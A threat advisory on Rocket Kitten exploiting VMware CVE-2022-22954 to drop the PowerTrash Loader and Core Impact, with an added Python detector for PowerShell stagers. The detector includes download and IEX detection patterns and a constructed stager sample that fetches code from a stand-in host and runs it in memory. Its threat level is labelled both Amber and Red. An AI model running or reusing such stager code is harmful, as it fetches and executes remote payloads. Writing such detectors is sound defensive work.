Newly patched VMware vulnerability exploited by Iranian espionage group, Rocket Kitten

Threat Level – Amber | Vulnerability Report

THREAT LEVEL: Red.


An Iranian cyber espionage group known as Rocket Kitten has begun delivering the Core Impact penetration testing tool to susceptible computers by exploiting a newly fixed severe vulnerability in the VMware Workspace ONE Access/Identity Manager software.

Threat actors use the VMware Identity Manager Service flaw (CVE-2022-22954) to acquire initial access to a target system, then install a PowerShell stager that downloads the next-stage payload, nicknamed PowerTrash Loader. PowerTrash Loader is a 40,000-line PowerShell script that has been substantially obfuscated. At the end of the attack chain, PowerTrash Loader loads the Core Impact penetration testing framework into memory.
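The chain described above (a stager that fetches a next stage, a very large obfuscated script, and an in-memory load of the final payload) gives defenders concrete traits to look for in collected PowerShell script blocks. The following is an added triage example, not code from the advisory or from Morphisec; its indicator patterns, line and entropy thresholds, and both sample scripts are constructed assumptions.

```python
import math
import re
from collections import Counter

# Constructed heuristics for a PowerShell stager/loader of the kind the advisory
# describes: next-stage download, in-memory assembly loading and heavy obfuscation.
# Pattern set and thresholds are assumptions, not taken from the advisory.
INDICATORS = {
    "invoke_expression": re.compile(r"\b(?:Invoke-Expression|IEX)\b", re.I),
    "stage_download": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I),
    "reflective_load": re.compile(r"\[(?:System\.)?Reflection\.Assembly\]::Load", re.I),
    "char_codes": re.compile(r"\[char\]\s*\d+", re.I),
    "base64": re.compile(r"FromBase64String|-EncodedCommand", re.I),
}
HUGE_SCRIPT_LINES = 10_000   # PowerTrash Loader is ~40,000 lines per the advisory
HIGH_ENTROPY_BITS = 5.2      # assumed cut-off for packed or encoded content

def shannon_entropy(text: str) -> float:
    """Bits per character; encoded or packed blobs score higher than plain script."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())

def score_script(script: str) -> dict:
    """Return indicator hit counts plus a simple additive score and a verdict."""
    lines = script.count("\n") + 1
    hits = {name: len(rx.findall(script)) for name, rx in INDICATORS.items()}
    score = sum(1 for count in hits.values() if count > 0)  # one point per indicator family
    if lines >= HUGE_SCRIPT_LINES:
        score += 2                                          # oversized script, as with PowerTrash
    entropy = shannon_entropy(script)
    if entropy >= HIGH_ENTROPY_BITS:
        score += 1
    return {"lines": lines, "entropy": round(entropy, 2), "hits": hits,
            "score": score, "suspicious": score >= 3}

# Constructed samples (not real malware): a routine admin script and a stager-like one.
BENIGN = """Get-Service | Where-Object { $_.Status -eq 'Running' } |
    Export-Csv -Path C:\\temp\\services.csv -NoTypeInformation
Write-Host 'done'
"""
STAGER_LIKE = """$w = New-Object Net.WebClient
$s = $w.DownloadString('http://placeholder.invalid/stage2')   # constructed URL
IEX ([char]73 + [char]69 + [char]88)
[System.Reflection.Assembly]::Load([byte[]]$b).EntryPoint.Invoke($null, $null)
"""

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("stager_like", STAGER_LIKE)):
        print(name, score_script(sample))
```

Run it against script blocks exported from PowerShell Script Block Logging (Event ID 4104) to rank which ones deserve a manual look; the score is a triage aid, not a verdict.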

The MITRE ATT&CK TTPs commonly used by Rocket Kitten are:

TA0001: Initial Access

TA0002: Execution

TA0006: Credential Access

TA0009: Collection

TA0011: Command and Control

T1059: Command and Scripting Interpreter

T1189: Drive-by Compromise

T1555.003: Credentials from Password Stores: Credentials from Web Browsers

T1105: Ingress Tool Transfer

T1056.001: Input Capture: Keylogging

T1566.001: Phishing: Spearphishing Attachment

T1566.003: Phishing: Spearphishing via Service

T1204.002: User Execution: Malicious File

Actor Details

Vulnerability Details

Indicators of Compromise (IoCs)

Patch Links

https://www.vmware.com/security/advisories/VMSA-2022-0011.html

References

https://blog.morphisec.com/vmware-identity-manager-attack-backdoor
